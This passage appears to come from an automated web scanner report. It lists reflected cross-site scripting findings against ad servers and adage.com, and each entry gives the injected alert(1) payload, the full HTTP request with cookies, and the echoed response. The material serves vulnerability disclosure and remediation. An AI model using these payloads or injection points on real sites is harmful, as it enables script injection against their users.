Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=12244bc34a8b1dc; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 31 Aug 2011 17:54:54 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7703

var cid='12244bc34a8b1dc';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("ns-10212190423_1314813294","http://ib.adnxs.com/ptj?member=988&inv_code=ns.informitadf09'-alert(1)-'882062a794c&size=728x90&imp_id=ns-10212190423_1314813294,12244bc34a8b1dc&referrer=http%3A%2F%2Fwww.informit.com%2Findex.aspx%3F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fns.informitadf09%27-alert%281%29-%2788
...[SNIP]...

1.6. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49732'-alert(1)-'e101f0e3a6e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj49732'-alert(1)-'e101f0e3a6e/q1.nydailynews/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?;ord1=583298;cmpgurl=http%253A//www.nydailynews.com/news/index.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:46 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:46 GMT
Content-Length: 7756

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30314283681_1313102566","http://ad.doubleclick.net/adj49732'-alert(1)-'e101f0e3a6e/q1.nydailynews/be_news_fr;net=q1;u=,q1-30314283681_1313102566,1214cf76b201e60,educat,q1.educat_h-q1.fam_m;;cmw=owl;sz=728x90;net=q1;ord1=583298;contx=educat;dc=s;btg=q1.educat_h;btg=q1.fam_m;ord=13131
...[SNIP]...

1.7. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3ae6'-alert(1)-'d4fccf3dad4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.nydailynewsc3ae6'-alert(1)-'d4fccf3dad4/be_news_fr;sz=728x90;net=q1;ord=1313102451.47533?;ord1=583298;cmpgurl=http%253A//www.nydailynews.com/news/index.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:48 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:48 GMT
Content-Length: 7756

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30121332100_1313102568","http://ad.doubleclick.net/adj/q1.nydailynewsc3ae6'-alert(1)-'d4fccf3dad4/be_news_fr;net=q1;u=,q1-30121332100_1313102568,1214cf76b201e60,educat,q1.educat_h-q1.fam_m;;cmw=owl;sz=728x90;net=q1;ord1=583298;contx=educat;dc=s;btg=q1.educat_h;btg=q1.fam_m;ord=1313102451.47533??",
...[SNIP]...

1.8. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ab3'-alert(1)-'496270f1c8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.nydailynews/be_news_frc8ab3'-alert(1)-'496270f1c8d;sz=728x90;net=q1;ord=1313102451.47533?;ord1=583298;cmpgurl=http%253A//www.nydailynews.com/news/index.html? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:49 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:49 GMT
Content-Length: 7756

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30105561087_1313102569","http://ad.doubleclick.net/adj/q1.nydailynews/be_news_frc8ab3'-alert(1)-'496270f1c8d;net=q1;u=,q1-30105561087_1313102569,1214cf76b201e60,educat,q1.educat_h-q1.fam_m;;cmw=owl;sz=728x90;net=q1;ord1=583298;contx=educat;dc=s;btg=q1.educat_h;btg=q1.fam_m;ord=1313102451.47533??","728","90",
...[SNIP]...

1.9. http://a.collective-media.net/cmadj/q1.nydailynews/be_news_fr [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.nydailynews/be_news_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb061'-alert(1)-'3b9133a92e3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.nydailynews/be_news_fr;sz=bb061'-alert(1)-'3b9133a92e3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=1214cf76b201e60; dc=sea

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Thu, 11 Aug 2011 22:42:41 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Thu, 18-Aug-2011 22:42:41 GMT
Content-Length: 7729

var cid='1214cf76b201e60';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
eMedia.createAndAttachAd("q1-30314090774_1313102561","http://ad.doubleclick.net/adj/q1.nydailynews/be_news_fr;net=q1;u=,q1-30314090774_1313102561,1214cf76b201e60,none,q1.educat_m-q1.fam_l;;cmw=nurl;sz=bb061'-alert(1)-'3b9133a92e3;contx=none;dc=s;btg=q1.educat_m;btg=q1.fam_l?","bb061'-alert(1)-'3b9133a92e3","",false);</scr'+'ipt>
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [dcove parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0ad5"-alert(1)-"299ee2f63f6 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirectd0ad5"-alert(1)-"299ee2f63f6&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=;ord=08dcd5d0-76e4-4739-88e9-ffac3e204fc4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5599
Date: Thu, 11 Aug 2011 22:35:47 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
65832709%3B3454-728/90%3B42962870/42980657/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirectd0ad5"-alert(1)-"299ee2f63f6&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com");
var
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b85d2"-alert(1)-"9fb1a5c772 was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Clickb85d2"-alert(1)-"9fb1a5c772&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=;ord=08dcd5d0-76e4-4739-88e9-ffac3e204fc4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5598
Date: Thu, 11 Aug 2011 22:36:13 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
B3454-728/90%3B42962886/42980673/1%3B%3B%7Efdr%3D242952151%3B0-0%3B0%3B65830267%3B3454-728/90%3B42793270/42811057/1%3B%3B%7Esscs%3D%3fhttp://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Clickb85d2"-alert(1)-"9fb1a5c772&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=http://www.chevydealer.com");
var dcpass =
...[SNIP]...

1.12. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dc4b"-alert(1)-"25b430650 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-1dc4b"-alert(1)-"25b430650&redirectURL=;ord=08dcd5d0-76e4-4739-88e9-ffac3e204fc4? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5594
Date: Thu, 11 Aug 2011 22:36:42 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-1dc4b"-alert(1)-"25b430650&redirectURL=http://www.chevydealer.com");
var dcpass = "?cmp=OLA_BRAND_5198302_42962886";
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
va
...[SNIP]...

1.13. http://ad.doubleclick.net/adj/N3880.invite.com/B5102299.17 [redirectURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3880.invite.com/B5102299.17

Issue detail

The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e6bc"-alert(1)-"86ae1e132e1 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3880.invite.com/B5102299.17;dcove=o;sz=728x90;click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=6e6bc"-alert(1)-"86ae1e132e1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_btf?t=1313102150517&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5386
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 11 Aug 2011 22:37:12 GMT
Expires: Thu, 11 Aug 2011 22:37:12 GMT

document.write('<!-- Template Id = 15,962 Template Name = Banner Creative (Flash) - In Page Multiples - Branding Omniture -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n');

fun
...[SNIP]...
dia.com/pixel?returnType=redirect&key=Click&message=eJwVjEsOgDAIRK9iWNuEFlrA25h.VsadK.PdhdW8F5h5gQiOrZii7RtQcZGsmsOyC6COPurAJG1yYiFLqtPSWmenWZBXZ4hqPEstKGGx0zyrZ6ZWHdnxfq7LscXVDPH7Ad4hG1Y-&redirectURL=6e6bc"-alert(1)-"86ae1e132e1http://www.chevydealer.com");
var dcpass = "?cmp=OLA_BRAND_5198302_42962886";
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
...[SNIP]...

1.14. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3468"><script>alert(1)</script>4e3e8f5f0f was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=f3468"><script>alert(1)</script>4e3e8f5f0f&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=8397/13532
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rv=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15244%7C15235%7C15228%7C15228%7C15231

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 22:12:10 GMT
Content-Length: 383

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=7338351112149216207&fpid=f3468"><script>alert(1)</script>4e3e8f5f0f&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.15. http://ad.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1d9e"><script>alert(1)</script>2194221d73c was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=c1d9e"><script>alert(1)</script>2194221d73c HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=8397/13532
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optOut=1; rv=1; uid=2944787775510337379; rrs=1006%7C1003%7C1002%7C4%7C1004%7C9%7C6; rds=15231%7C15228%7C15244%7C15235%7C15228%7C15228%7C15231

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 22:12:11 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2944787775510337379&rnd=2694303666463007078&fpid=6&nu=n&t=&sp=c1d9e"><script>alert(1)</script>2194221d73c&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.16. http://adage.com//images/save-and-share-icons/icon-digg.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   //images/save-and-share-icons/icon-digg.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cfb"-alert(1)-"dabdda859b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET //images46cfb"-alert(1)-"dabdda859b0/save-and-share-icons/icon-digg.png?1291744534 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
